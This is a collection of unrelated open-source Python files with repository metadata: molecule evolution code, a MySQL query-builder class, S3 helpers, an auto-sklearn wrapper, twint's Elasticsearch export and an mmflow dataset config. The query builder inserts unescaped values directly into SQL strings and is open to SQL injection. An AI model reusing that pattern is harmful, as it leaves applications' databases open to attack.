order (list) : list of molecule indices arranged in Decreasing order of fitness
to_replace (list) : list of indices of molecules to be replaced by random mutations of better molecules
to_keep (list) : list of indices of molecules to be kept in following generation
selfies_ordered (list) : list of SELFIE molecules, ordered by fitness
smiles_ordered (list) : list of SMILE molecules, ordered by fitness
max_molecules_len (int) : length of largest molecule
Returns:
smiles_mutated (list): next generation of mutated molecules as SMILES
selfies_mutated(list): next generation of mutated molecules as SELFIES
'''
smiles_mutated = []
selfies_mutated = []
for idx in range(0,len(order)):
if idx in to_replace: # smiles to replace (by better molecules)
random_index=np.random.choice(to_keep, size=1, replace=True, p=None)[0] # select a random molecule that survived
grin_new, smiles_new = evo.mutations_random_grin(selfies_ordered[random_index], max_molecules_len) # do the mutation
# add mutated molecule to the population
smiles_mutated.append(smiles_new)
selfies_mutated.append(grin_new)
else: # smiles to keep
smiles_mutated.append(smiles_ordered[idx])
selfies_mutated.append(selfies_ordered[idx])
return smiles_mutated, selfies_mutated
def obtain_discrm_data(disc_enc_type, molecules_reference, smiles_mutated, selfies_mutated, max_molecules_len, num_processors, generation_index):
'''Obtain data that will be used to train the discriminator (inputs & labels)
'''
if disc_enc_type == 'smiles':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(smiles_mutated))])
elif disc_enc_type == 'selfies':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(selfies_mutated)).tolist()
dataset_smiles = selfies_mutated + random_dataset_selection
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in selfies_mutated] +
[1 for i in range(len(dataset_smiles)-len(selfies_mutated))])
elif disc_enc_type == 'properties_rdkit':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo.obtain_discr_encoding(dataset_smiles, disc_enc_type, max_molecules_len, num_processors, generation_index)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(selfies_mutated))])
# Shuffle training data
order_training = np.array(range(len(dataset_smiles))) #np.arange(len(dataset_smiles))
np.random.shuffle(order_training)
dataset_x = dataset_x[order_training]
dataset_y = dataset_y[order_training]
return dataset_x, dataset_y
def update_gen_res(smiles_all, smiles_mutated, selfies_all, selfies_mutated, smiles_all_counter):
'''Collect results that will be shared with global variables outside generations
'''
smiles_all.append(smiles_mutated)
selfies_all.append(selfies_mutated)
for smi in smiles_mutated:
if smi in smiles_all_counter:
smiles_all_counter[smi] += 1
else:
smiles_all_counter[smi] = 1
return smiles_all, selfies_all, smiles_all_counter
| 47.75 | 252 | 0.643372 |
5b8c822bb202a604a59268cdb291c793c7854bd1 | 8,776 | py | Python | MDB.py | neoinmatrix/MDB | ca88bc3caf9f59583197598290c2f48bd370a76c | [
"Apache-2.0"
] | null | null | null | MDB.py | neoinmatrix/MDB | ca88bc3caf9f59583197598290c2f48bd370a76c | [
"Apache-2.0"
] | null | null | null | MDB.py | neoinmatrix/MDB | ca88bc3caf9f59583197598290c2f48bd370a76c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Date : 18-11-28
# Author : neo
import yaml
import os
import torndb
class DB:
options = {
"field": "",
"table": "",
"join": "",
"where": "",
"having": "",
"group": "",
"order": "",
"limit": "",
}
temp = {
"add": "",
"update": "",
}
def __init__(self, conf="./default.yaml"):
try:
if type(conf) == str:
if os.path.exists(conf) == False:
err = "Error conf file not exists"
raise Exception(err)
with open(conf) as cf:
dbconf = yaml.load(cf)["db"]
if conf == False:
raise ("no setting")
else:
self.dbconf = dbconf
except:
print "can not load database setting"
self.getConn()
def getConn(self):
db = torndb.Connection(**self.dbconf)
self.dbconn = db
return self
def table(self, table):
for k in self.options:
self.options[k] = ''
for k in self.temp:
self.temp[k] = ''
tb = table.split(' ')
if len(tb) > 1:
table = "`%s` %s" % (tb[0], tb[1])
else:
table = "`%s`" % table
self.options['table'] = table
return self
def query(self, sql):
result = self.dbconn.query(sql)
return result
def execute(self, sql):
result = self.dbconn.execute(sql)
return result
def fetch(self, type='select'):
if self.options["table"] == "":
raise Exception("no table selected")
if type == "select":
sql = "select (field) from (table) (join) (where) (group) (having) (order) (limit) ;"
for k, v in self.options.items():
if k == "field" and v == '':
v = " * "
sql = sql.replace(" (%s) " % k, v)
sql = " ".join(sql.split())
elif type == "insert":
add = self.temp["add"]
sql = "insert into (table) ( (key) ) value ( (value) );"
keys = ",".join(["`%s`" % str(k) for k in add.keys()])
values = ",".join(["'%s'" % str(v) for v in add.values()])
sql = sql.replace(" (table) ", self.options["table"])
sql = sql.replace(" (key) ", keys)
sql = sql.replace(" (value) ", values)
elif type == "update":
sql = "update (table) (join) set (update) (where) ;"
for k, v in self.options.items():
if k == "where" and v == "":
raise Exception("no where identity, use ' ' for where ")
sql = sql.replace(" (%s) " % k, v)
updates = []
for k, v in self.temp["update"].items():
t = k.split('.')
if len(t) > 1:
updates.append(" %s.`%s`='%s'" % (t[0], t[1], v))
else:
updates.append(" `%s`='%s'" % (k, v))
update = ",".join(updates)
sql = sql.replace(" (update) ", update)
elif type == "delete":
sql = "delete from (table) (join) (where) (group) (having) ;"
for k, v in self.options.items():
if k == "where" and v == "":
raise Exception("no where identity, use ' ' for where ")
sql = sql.replace(" (%s) " % k, v)
else:
sql = ""
sql = " ".join(sql.split())
return sql
def find(self):
self.options["limit"] = "limit 0,1"
sql = self.fetch("select")
result = self.dbconn.get(sql)
self.sql = sql
return result
def select(self):
sql = self.fetch("select")
result = self.dbconn.query(sql)
self.sql = sql
return result
def insert(self, add=''):
if add == '' or type(add) != dict:
return ''
self.temp["add"] = add
sql = self.fetch("insert")
result = self.dbconn.execute(sql)
self.sql = sql
return result
def add(self, add=''):
return self.insert(add)
def delete(self):
sql = self.fetch("delete")
result = self.dbconn.execute_rowcount(sql)
self.sql = sql
return result
def update(self, update):
if update == '' or type(update) != dict:
return ''
self.temp["update"] = update
sql = self.fetch("update")
result = self.dbconn.execute(sql)
self.sql = sql
return result
def save(self, update):
return self.update(update)
def where(self, where):
if type(where) == dict and len(where) > 0:
where_arr = []
logic = ["exp", "eq", "neq", "lt", "gt", "elt", "egt",
"between", "not between", "in", "not in", "like"]
for k, v in where.items():
if len(k.split('.')) > 1:
key = " %s.`%s` " % (k.split('.')[0], k.split('.')[1])
elif k == "_string":
where_arr.append(v)
continue
else:
key = " `%s` " % (k)
if type(v) is not list:
where_arr.append("%s = '%s'" % (key, str(v)))
continue
vl = v[0].lower()
if vl not in logic:
continue
if vl == 'exp':
where_arr.append(" %s %s " % (key, str(v[1])))
continue
elif vl == 'eq':
where_arr.append(" %s = '%s' " % (key, str(v[1])))
continue
elif vl == 'neq':
where_arr.append(" %s <> '%s' " % (key, str(v[1])))
continue
elif vl == 'lt':
where_arr.append(" %s < '%s' " % (key, str(v[1])))
continue
elif vl == 'elt':
where_arr.append(" %s <= '%s' " % (key, str(v[1])))
continue
elif vl == 'gt':
where_arr.append(" %s > '%s' " % (key, str(v[1])))
continue
elif vl == 'egt':
where_arr.append(" %s >= '%s' " % (key, str(v[1])))
continue
elif vl == 'between':
where_arr.append(" %s between '%s' and '%s' " % (key, str(v[1][0]), str(v[1][1])))
continue
elif vl == 'not between':
where_arr.append(" %s not between '%s' and '%s' " % (key, str(v[1][0]), str(v[1][1])))
continue
elif vl == 'in':
vv = ["'%s'" % str(x) for x in v[1]]
where_arr.append(" %s in (%s) " % (key, ",".join(vv)))
continue
elif vl == 'not in':
vv = ["'%s'" % str(x) for x in v[1]]
where_arr.append(" %s not in (%s) " % (key, ",".join(vv)))
continue
elif vl == 'like':
where_arr.append(" %s like '%%%s%%' " % (key, v[1]))
continue
else:
continue
where = " where " + ' and '.join(where_arr)
where = ' '.join(where.split())
if type(where) == list and len(where) > 0:
where = "where " + " and ".join(where)
where = ' '.join(where.split())
self.options['where'] = where
return self
def join(self, join):
if type(join) == list:
join = ' '.join(join)
self.options["join"] = join
return self
def field(self, field):
self.options["field"] = field
return self
def group(self, group):
self.options["group"] = "group by %s" % group
return self
def having(self, having):
self.options["having"] = "having %s" % having
return self
def limit(self, limit):
if type(limit) == list:
self.options["limit"] = " limit %s,%s" % (limit[0], limit[1])
else:
self.options["limit"] = " limit %s" % limit
return self
def order(self, order):
self.options["order"] = " order by %s" % order
return self
def getField(self, field):
farr = field.split("as")
if len(farr) > 1:
get_field = farr[1].trim()
else:
get_field = field
self.options["field"] = field
result = self.find()
if result == None:
return ''
return result[get_field]
| 33.242424 | 112 | 0.419325 |
76256c23fc913068f06c99ae5870cdb964ee54ba | 3,811 | py | Python | util.py | aws-samples/sagemaker-deepar-workshop-es | 3c602570781f64ee0878f942a269f30c1b46710d | [
"MIT-0"
] | 1 | 2022-03-22T21:19:18.000Z | 2022-03-22T21:19:18.000Z | util.py | aws-samples/sagemaker-deepar-workshop-es | 3c602570781f64ee0878f942a269f30c1b46710d | [
"MIT-0"
] | null | null | null | util.py | aws-samples/sagemaker-deepar-workshop-es | 3c602570781f64ee0878f942a269f30c1b46710d | [
"MIT-0"
] | null | null | null | import pandas as pd
from botocore.exceptions import ClientError
from datetime import date, timedelta
def week_days(start_date, end_date):
"""
Creates a list of the Mondays through Fridays contained in the range of dates.
:param start_date: The starting date to evaluate, if it is a working day then is included in the list.
:param end_date: The end date, it is excluded even if is a working day.
:return: List of working days.
"""
days = list()
eval_date = start_date
while eval_date < end_date:
if eval_date.weekday() < 5:
days.append(eval_date)
eval_date = eval_date + timedelta(days=1)
return days
def list_keys(client, bucket, prefix, token=None):
"""
Recursive function used to retrieve all the object keys that match with a given prefix in the given S3 bucket.
:param client: Client for the Amazon S3 service.
:param bucket: The S3 bucket name.
:param prefix: The prefix used for filtering.
:param token: The continuation token returned by a previous call.
:return: The found keys matching the prefix.
"""
keys = list()
response = client.list_objects_v2(
Bucket=bucket,
Prefix=prefix,
ContinuationToken=token
) if token else client.list_objects_v2(
Bucket=bucket,
Prefix=prefix
)
if 'Contents' in response:
for item in response['Contents']:
keys.append(item['Key'])
if 'NextContinuationToken' in response:
keys += list_keys(client, bucket, prefix, response['NextContinuationToken'])
return keys
def copy_objects(client, src_bucket, dest_bucket, dest_prefix, dates):
"""
Copy the XETRA dataset objects from the source bucket to the destination bucket.
:param client: Client for the Amazon S3 service.
:param src_bucket: Source bucket containing the XETRA data set.
:param dest_bucket: Destination object where the data set will be copied.
:param dest_prefix: The destination prefix used to create the destination object keys.
:param dates: The list of dates used to copy the objects.
:return: List of available objects.
"""
object_keys = list()
already_copied = list_keys(client, dest_bucket, dest_prefix)
for weekday in dates:
try:
# Catch error if a day does not exist in the source data set
for hour in range(0, 24):
src_key = f'{weekday.isoformat()}/{weekday.isoformat()}_BINS_XETR{hour:02d}.csv'
key = f'{dest_prefix}/{weekday.isoformat()}_BINS_XETR{hour:02d}.csv'
# Copy only new objects.
if key not in already_copied:
client.copy_object(
Bucket=dest_bucket,
Key=key,
CopySource={
'Bucket': src_bucket,
'Key': src_key
}
)
object_keys.append(key)
except ClientError as error:
print(error)
return object_keys
def create_dataframe(client, bucket, object_keys):
"""
Loads the list of objects from the S3 bucket into a pandas dataframe. Finally, concatenates all frames.
:param client: The Amazon S3 client.
:param bucket: Source bucket where the data will be read.
:param object_keys: The objects keys to read.
:return: The concatenated data frames.
"""
dfs = list()
for key in object_keys:
response = client.get_object(
Bucket=bucket,
Key=key
)
dfs.append(pd.read_csv(response['Body']))
return pd.concat(dfs, ignore_index=True)
| 38.494949 | 115 | 0.617423 |
f8802cfd5f72c320825a02a069ba5ae6a4b0c497 | 5,633 | py | Python | autosklearn_wrapper.py | inovex/automated-feature-engineering | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | [
"MIT"
] | null | null | null | autosklearn_wrapper.py | inovex/automated-feature-engineering | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | [
"MIT"
] | null | null | null | autosklearn_wrapper.py | inovex/automated-feature-engineering | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | [
"MIT"
] | null | null | null | import argparse
import os
import pickle
import shutil
import time
from math import sqrt
import autosklearn.classification
import autosklearn.regression
import numpy as np
from autosklearn.pipeline.components.base import \
AutoSklearnRegressionAlgorithm
from joblib import dump
from sklearn.metrics import mean_squared_error
from Data import DataHandler
from autosklearn_configuration import OwnDecisionTree, OwnRandomForest, OwnLinearReg, OwnLassoLarsCV
def rmse_scorer(y_true, y_pred):
# rmse only from 0.22 onwards in scikit learn, autosklearn uses currently 0.21
return sqrt(mean_squared_error(y_true, y_pred))
class AutosklearnWrapper:
def __init__(self, model, dataFunction, trainSize=0.7, preprocessed=True, folderID=None, nDataPoints=100000):
if model in "DecisionTree":
self.model = OwnDecisionTree
elif model in "RandomForest":
self.model = OwnRandomForest
elif model in "LinearRegression":
self.model = OwnLinearReg
elif model in "LassoLarsCV":
self.model = OwnLassoLarsCV
else:
print(f'{model} not found!')
exit(1)
self.nDataPoints = nDataPoints
self.preprocessed = preprocessed
self.trainSize = trainSize
self.modelName = self.model.__name__
self.dataFunction = dataFunction
self.dataUsedName = self.dataFunction.__name__.split("_")[1]
# Export path
self.savePath = f'{os.path.dirname(os.path.abspath(__file__))}/runs/{self.dataUsedName}_{self.trainSize}/{self.modelName}'
# Add folder with number that represents evaluation run
self.savePath = DataHandler.createDictPath(self.savePath, folderID, False)
def regression(self, timeMax=60):
# Add regression component
autosklearn.pipeline.components.regression.add_regressor(self.model)
# Get data
X_train, X_test, y_train, y_test, feature_types = self.dataFunction(preprocessed=self.preprocessed, specifics="AUTOSKLEARN",
trainSize=self.trainSize, nDataPoints=self.nDataPoints)
rmse_metric = autosklearn.metrics.make_scorer(
name="rmse",
score_func=rmse_scorer,
optimum=0,
greater_is_better=False,
needs_proba=False,
needs_threshold=False,
)
# measure runtime
start_time = time.time()
# autosklearn automated feature engineering
automl = autosklearn.regression.AutoSklearnRegressor(
seed=np.random.randint(0, 100000),
ensemble_size=0,
time_left_for_this_task=timeMax*60,
per_run_time_limit=30*60,
tmp_folder=self.savePath,
delete_tmp_folder_after_terminate=False,
output_folder=f'{self.savePath}_output',
delete_output_folder_after_terminate=True,
include_estimators=[self.modelName, ],
# Does not take autosklearn and smac resources into account
ml_memory_limit=7000,
# cv for comparability
resampling_strategy='cv',
resampling_strategy_arguments={'folds': 4},
# Timeout hits earlier
smac_scenario_args={'runcount_limit': 5000}
)
# Fit changes data in place, need original for refit
automl.fit(X_train.copy(), y_train.copy(), dataset_name=self.dataUsedName, feat_type=feature_types, metric=rmse_metric)
print(f"Fit time {int(divmod(time.time() - start_time, 60)[0])}")
# final ensemble on the whole dataset.
automl.fit_ensemble(y_train.copy(), ensemble_size=1)
print(f"Fit ensemble time {int(divmod(time.time() - start_time, 60)[0])}")
automl.refit(X_train.copy(), y_train.copy())
print(f"Refit time {int(divmod(time.time() - start_time, 60)[0])}")
total_time = int(divmod(time.time() - start_time, 60)[0])
# export model
dump(automl, f"{self.savePath}/model_time{total_time}.joblib")
# make predictions
predictions = automl.predict(X_test)
predictionMetric = rmse_scorer(y_test, predictions)
# Export predictions and further stats
with open(f"{self.savePath}/performanceHistory_score{predictionMetric}.pkl", 'wb') as file:
pickle.dump(automl.cv_results_["mean_test_score"], file)
with open(f"{self.savePath}/sprintStatistics.pkl", 'wb') as file:
pickle.dump(automl.sprint_statistics(), file)
# Remove large model files
shutil.rmtree(f'{self.savePath}/.auto-sklearn', ignore_errors=True)
# command-line for ease of use
parser = argparse.ArgumentParser(description='Autosklearn input parser')
parser.add_argument('--time', type=int, help='Time for the optimisation in minutes', default=1)
parser.add_argument('--model', help='Name of class chosen for evaluation')
parser.add_argument('--data', help='Name of data')
parser.add_argument('--trainSize', help='Train size', default=0.7, type=float)
parser.add_argument('--problem', help='Regression or classification problem')
parser.add_argument('--folderID', help='ID for folder')
parser.add_argument('--nDataPoints', type=int, help='Reduce data to subsample size.', default=100000)
args = parser.parse_args()
if "reg" in args.problem:
AutosklearnWrapper(model=args.model, dataFunction=DataHandler.stringToMethod(args.data), trainSize=args.trainSize,
folderID=args.folderID, nDataPoints=args.nDataPoints).regression(args.time)
else:
print("Not supported")
| 41.725926 | 132 | 0.676016 |
79a51cce2db2d1cf8a2fcff977874a8dfe699b68 | 13,961 | py | Python | twint/storage/elasticsearch.py | nicprd/twint | 0f19841b0f2e6456094c6c85b89faf8a0e82f7b1 | [
"MIT"
] | 4 | 2020-03-10T15:05:55.000Z | 2021-03-15T21:29:46.000Z | twint/storage/elasticsearch.py | robikurniawan/twint | 81f6c2c516a231136fbd821bd6a53d7959965fee | [
"MIT"
] | null | null | null | twint/storage/elasticsearch.py | robikurniawan/twint | 81f6c2c516a231136fbd821bd6a53d7959965fee | [
"MIT"
] | 2 | 2020-05-06T13:47:57.000Z | 2021-03-24T18:43:03.000Z | ## TODO - Fix Weekday situation
from elasticsearch import Elasticsearch, helpers
from geopy.geocoders import Nominatim
from time import strftime, localtime
import contextlib
import sys
_index_tweet_status = False
_index_follow_status = False
_index_user_status = False
_is_near_def = False
_is_location_def = False
_near = {}
_location = {}
geolocator = Nominatim(user_agent="twint-1.2")
class RecycleObject(object):
def write(self, junk): pass
def flush(self): pass
def getLocation(place, **options):
location = geolocator.geocode(place,timeout=1000)
if location:
if options.get("near"):
global _near
_near = {"lat": location.latitude, "lon": location.longitude}
return True
elif options.get("location"):
global _location
_location = {"lat": location.latitude, "lon": location.longitude}
return True
return {"lat": location.latitude, "lon": location.longitude}
else:
return {}
def handleIndexResponse(response):
try:
if response["status"] == 400:
return True
except KeyError:
pass
if response["acknowledged"]:
print("[+] Index \"" + response["index"] + "\" created!")
else:
print("[x] error index creation :: storage.elasticsearch.handleIndexCreation")
if response["shards_acknowledged"]:
print("[+] Shards acknowledged, everything is ready to be used!")
return True
else:
print("[x] error with shards :: storage.elasticsearch.HandleIndexCreation")
return False
def createIndex(config, instance, **scope):
if scope.get("scope") == "tweet":
tweets_body = {
"mappings": {
"properties": {
"id": {"type": "long"},
"conversation_id": {"type": "long"},
"created_at": {"type": "long"},
"date": {"type": "date", "format": "yyyy-MM-dd HH:mm:ss"},
"timezone": {"type": "keyword"},
"place": {"type": "keyword"},
"location": {"type": "keyword"},
"tweet": {"type": "text"},
"hashtags": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"cashtags": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"user_id_str": {"type": "keyword"},
"username": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"name": {"type": "text"},
"profile_image_url": {"type": "text"},
"day": {"type": "integer"},
"hour": {"type": "integer"},
"link": {"type": "text"},
"retweet": {"type": "text"},
"essid": {"type": "keyword"},
"nlikes": {"type": "integer"},
"nreplies": {"type": "integer"},
"nretweets": {"type": "integer"},
"quote_url": {"type": "text"},
"video": {"type":"integer"},
"search": {"type": "text"},
"near": {"type": "text"},
"geo_near": {"type": "geo_point"},
"geo_tweet": {"type": "geo_point"},
"photos": {"type": "text"},
"user_rt_id": {"type": "keyword"},
"mentions": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"source": {"type": "keyword"},
"user_rt": {"type": "keyword"},
"retweet_id": {"type": "keyword"},
"reply_to": {
"type": "nested",
"properties": {
"user_id": {"type": "keyword"},
"username": {"type": "keyword"}
}
},
"retweet_date": {"type": "date", "format": "yyyy-MM-dd HH:mm:ss"},
"urls": {"type": "keyword"},
"translate": {"type": "text"},
"trans_src": {"type": "keyword"},
"trans_dest": {"type": "keyword"},
}
},
"settings": {
"number_of_shards": 1,
"analysis": {
"normalizer": {
"hashtag_normalizer": {
"type": "custom",
"char_filter": [],
"filter": ["lowercase", "asciifolding"]
}
}
}
}
}
with nostdout():
resp = instance.indices.create(index=config.Index_tweets, body=tweets_body, ignore=400)
return handleIndexResponse(resp)
elif scope.get("scope") == "follow":
follow_body = {
"mappings": {
"properties": {
"user": {"type": "keyword"},
"follow": {"type": "keyword"},
"essid": {"type": "keyword"}
}
},
"settings": {
"number_of_shards": 1
}
}
with nostdout():
resp = instance.indices.create(index=config.Index_follow, body=follow_body, ignore=400)
return handleIndexResponse(resp)
elif scope.get("scope") == "user":
user_body = {
"mappings": {
"properties": {
"id": {"type": "keyword"},
"name": {"type": "keyword"},
"username": {"type": "keyword"},
"bio": {"type": "text"},
"location": {"type": "keyword"},
"url": {"type": "text"},
"join_datetime": {"type": "date", "format": "yyyy-MM-dd HH:mm:ss"},
"tweets": {"type": "integer"},
"following": {"type": "integer"},
"followers": {"type": "integer"},
"likes": {"type": "integer"},
"media": {"type": "integer"},
"private": {"type": "integer"},
"verified": {"type": "integer"},
"avatar": {"type": "text"},
"background_image": {"type": "text"},
"session": {"type": "keyword"},
"geo_user": {"type": "geo_point"}
}
},
"settings": {
"number_of_shards": 1
}
}
with nostdout():
resp = instance.indices.create(index=config.Index_users, body=user_body, ignore=400)
return handleIndexResponse(resp)
else:
print("[x] error index pre-creation :: storage.elasticsearch.createIndex")
return False
@contextlib.contextmanager
def nostdout():
savestdout = sys.stdout
sys.stdout = RecycleObject()
yield
sys.stdout = savestdout
def weekday(day):
weekdays = {
"Monday": 1,
"Tuesday": 2,
"Wednesday": 3,
"Thursday": 4,
"Friday": 5,
"Saturday": 6,
"Sunday": 7,
}
return weekdays[day]
def hour(datetime):
return strftime("%H", localtime(datetime))
def Tweet(Tweet, config):
global _index_tweet_status
global _is_near_def
weekdays = {
"Monday": 1,
"Tuesday": 2,
"Wednesday": 3,
"Thursday": 4,
"Friday": 5,
"Saturday": 6,
"Sunday": 7,
}
day = weekdays[strftime("%A", localtime(Tweet.datetime/1000))]
actions = []
dt = f"{Tweet.datestamp} {Tweet.timestamp}"
j_data = {
"_index": config.Index_tweets,
"_id": str(Tweet.id) + "_raw_" + config.Essid,
"_source": {
"id": str(Tweet.id),
"conversation_id": Tweet.conversation_id,
"created_at": Tweet.datetime,
"date": dt,
"timezone": Tweet.timezone,
"place": Tweet.place,
"tweet": Tweet.tweet,
"hashtags": Tweet.hashtags,
"cashtags": Tweet.cashtags,
"user_id_str": Tweet.user_id_str,
"username": Tweet.username,
"name": Tweet.name,
"day": day,
"hour": hour(Tweet.datetime/1000),
"link": Tweet.link,
"retweet": Tweet.retweet,
"essid": config.Essid,
"nlikes": int(Tweet.likes_count),
"nreplies": int(Tweet.replies_count),
"nretweets": int(Tweet.retweets_count),
"quote_url": Tweet.quote_url,
"video": Tweet.video,
"search": str(config.Search),
"near": config.Near
}
}
if Tweet.retweet:
j_data["_source"].update({"user_rt_id": Tweet.user_rt_id})
j_data["_source"].update({"user_rt": Tweet.user_rt})
j_data["_source"].update({"retweet_id": Tweet.retweet_id})
j_data["_source"].update({"retweet_date": Tweet.retweet_date})
if Tweet.reply_to:
j_data["_source"].update({"reply_to": Tweet.reply_to})
if Tweet.photos:
_photos = []
for photo in Tweet.photos:
_photos.append(photo)
j_data["_source"].update({"photos": _photos})
if Tweet.mentions:
_mentions = []
for mention in Tweet.mentions:
_mentions.append(mention)
j_data["_source"].update({"mentions": _mentions})
if Tweet.urls:
_urls = []
for url in Tweet.urls:
_urls.append(url)
j_data["_source"].update({"urls": _urls})
if config.Near or config.Geo:
if not _is_near_def:
__geo = ""
__near = ""
if config.Geo:
__geo = config.Geo
if config.Near:
__near = config.Near
_is_near_def = getLocation(__near + __geo, near=True)
if _near:
j_data["_source"].update({"geo_near": _near})
if Tweet.place:
_t_place = getLocation(Tweet.place)
if _t_place:
j_data["_source"].update({"geo_tweet": getLocation(Tweet.place)})
if Tweet.source:
j_data["_source"].update({"source": Tweet.Source})
if config.Translate:
j_data["_source"].update({"translate": Tweet.translate})
j_data["_source"].update({"trans_src": Tweet.trans_src})
j_data["_source"].update({"trans_dest": Tweet.trans_dest})
actions.append(j_data)
es = Elasticsearch(config.Elasticsearch, verify_certs=config.Skip_certs)
if not _index_tweet_status:
_index_tweet_status = createIndex(config, es, scope="tweet")
with nostdout():
helpers.bulk(es, actions, chunk_size=2000, request_timeout=200)
actions = []
def Follow(user, config):
global _index_follow_status
actions = []
if config.Following:
_user = config.Username
_follow = user
else:
_user = user
_follow = config.Username
j_data = {
"_index": config.Index_follow,
"_id": _user + "_" + _follow + "_" + config.Essid,
"_source": {
"user": _user,
"follow": _follow,
"essid": config.Essid
}
}
actions.append(j_data)
es = Elasticsearch(config.Elasticsearch, verify_certs=config.Skip_certs)
if not _index_follow_status:
_index_follow_status = createIndex(config, es, scope="follow")
with nostdout():
helpers.bulk(es, actions, chunk_size=2000, request_timeout=200)
actions = []
def UserProfile(user, config):
global _index_user_status
global _is_location_def
actions = []
j_data = {
"_index": config.Index_users,
"_id": user.id + "_" + user.join_date + "_" + user.join_time + "_" + config.Essid,
"_source": {
"id": user.id,
"name": user.name,
"username": user.username,
"bio": user.bio,
"location": user.location,
"url": user.url,
"join_datetime": user.join_date + " " + user.join_time,
"tweets": user.tweets,
"following": user.following,
"followers": user.followers,
"likes": user.likes,
"media": user.media_count,
"private": user.is_private,
"verified": user.is_verified,
"avatar": user.avatar,
"background_image": user.background_image,
"session": config.Essid
}
}
if config.Location:
if not _is_location_def:
_is_location_def = getLocation(user.location, location=True)
if _location:
j_data["_source"].update({"geo_user": _location})
actions.append(j_data)
es = Elasticsearch(config.Elasticsearch, verify_certs=config.Skip_certs)
if not _index_user_status:
_index_user_status = createIndex(config, es, scope="user")
with nostdout():
helpers.bulk(es, actions, chunk_size=2000, request_timeout=200)
actions = []
| 38.040872 | 99 | 0.471528 |
619f90dfb5405eeae06f2b81e9a9382de2cefb76 | 1,177 | py | Python | var/spack/repos/builtin/packages/libtlx/package.py | carlabguillen/spack | 7070bb892f9bdb5cf9e76e0eecd64f6cc5f4695c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2020-05-24T15:23:12.000Z | 2020-05-24T15:23:12.000Z | var/spack/repos/builtin/packages/libtlx/package.py | carlabguillen/spack | 7070bb892f9bdb5cf9e76e0eecd64f6cc5f4695c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6 | 2022-02-26T11:44:34.000Z | 2022-03-12T12:14:50.000Z | var/spack/repos/builtin/packages/libtlx/package.py | carlabguillen/spack | 7070bb892f9bdb5cf9e76e0eecd64f6cc5f4695c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2019-10-29T09:08:17.000Z | 2019-10-29T09:08:17.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libtlx(CMakePackage):
""" tlx is a collection of C++ helpers and extensions universally needed,
but not found in the STL.
The most important design goals and conventions are:
1) high modularity with as little dependencies between
modules as possible.
2) attempt to never break existing interfaces.
3) compile on all platforms with C++ - smartphones, supercomputers,
windows, etc.
4) zero external dependencies: no additional libraries are required.
5) warning and bug-freeness on all compilers.
6) keep overhead down - small overall size such that is can be included
without bloating applications."""
homepage = "https://tlx.github.io/"
url = "https://github.com/tlx/tlx/archive/v0.5.20191212.tar.gz"
maintainers = ['fabratu']
version('0.5.20191212', sha256='5e67d3042a390dbb831b6d46437e3c7fadf738bff362aa7376b210b10ecd532d')
| 40.586207 | 102 | 0.700935 |
edf8a1e360cb12d9f1a05dcdf4604547c60c1867 | 3,215 | py | Python | configs/_base_/datasets/sintel_384x768.py | hologerry/mmflow | 40caf064851bd95317424e31cc137c0007a2bece | [
"Apache-2.0"
] | 481 | 2021-11-16T07:04:23.000Z | 2022-03-31T22:21:21.000Z | configs/_base_/datasets/sintel_384x768.py | hologerry/mmflow | 40caf064851bd95317424e31cc137c0007a2bece | [
"Apache-2.0"
] | 72 | 2021-11-16T12:25:55.000Z | 2022-03-28T13:10:45.000Z | configs/_base_/datasets/sintel_384x768.py | hologerry/mmflow | 40caf064851bd95317424e31cc137c0007a2bece | [
"Apache-2.0"
] | 48 | 2021-11-16T06:48:46.000Z | 2022-03-30T12:46:40.000Z | dataset_type = 'Sintel'
data_root = 'data/Sintel'
img_norm_cfg = dict(mean=[0., 0., 0.], std=[255., 255., 255.], to_rgb=False)
crop_size = (384, 768)
global_transform = dict(
translates=(0.05, 0.05),
zoom=(1.0, 1.5),
shear=(0.86, 1.16),
rotate=(-10., 10.))
relative_transform = dict(
translates=(0.00375, 0.00375),
zoom=(0.985, 1.015),
shear=(1.0, 1.0),
rotate=(-1.0, 1.0))
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_occ=True),
dict(
type='ColorJitter',
brightness=0.5,
contrast=0.5,
saturation=0.5,
hue=0.5),
dict(type='RandomGamma', gamma_range=(0.7, 1.5)),
dict(type='Normalize', **img_norm_cfg),
dict(type='GaussianNoise', sigma_range=(0, 0.04), clamp_range=(0., 1.)),
dict(type='RandomFlip', prob=0.5, direction='horizontal'),
dict(type='RandomFlip', prob=0.5, direction='vertical'),
dict(
type='RandomAffine',
global_transform=global_transform,
relative_transform=relative_transform),
dict(type='RandomCrop', crop_size=crop_size),
dict(type='DefaultFormatBundle'),
dict(
type='Collect',
keys=['imgs', 'flow_gt'],
meta_keys=[
'img_fields', 'ann_fields', 'filename1', 'filename2',
'ori_filename1', 'ori_filename2', 'filename_flow',
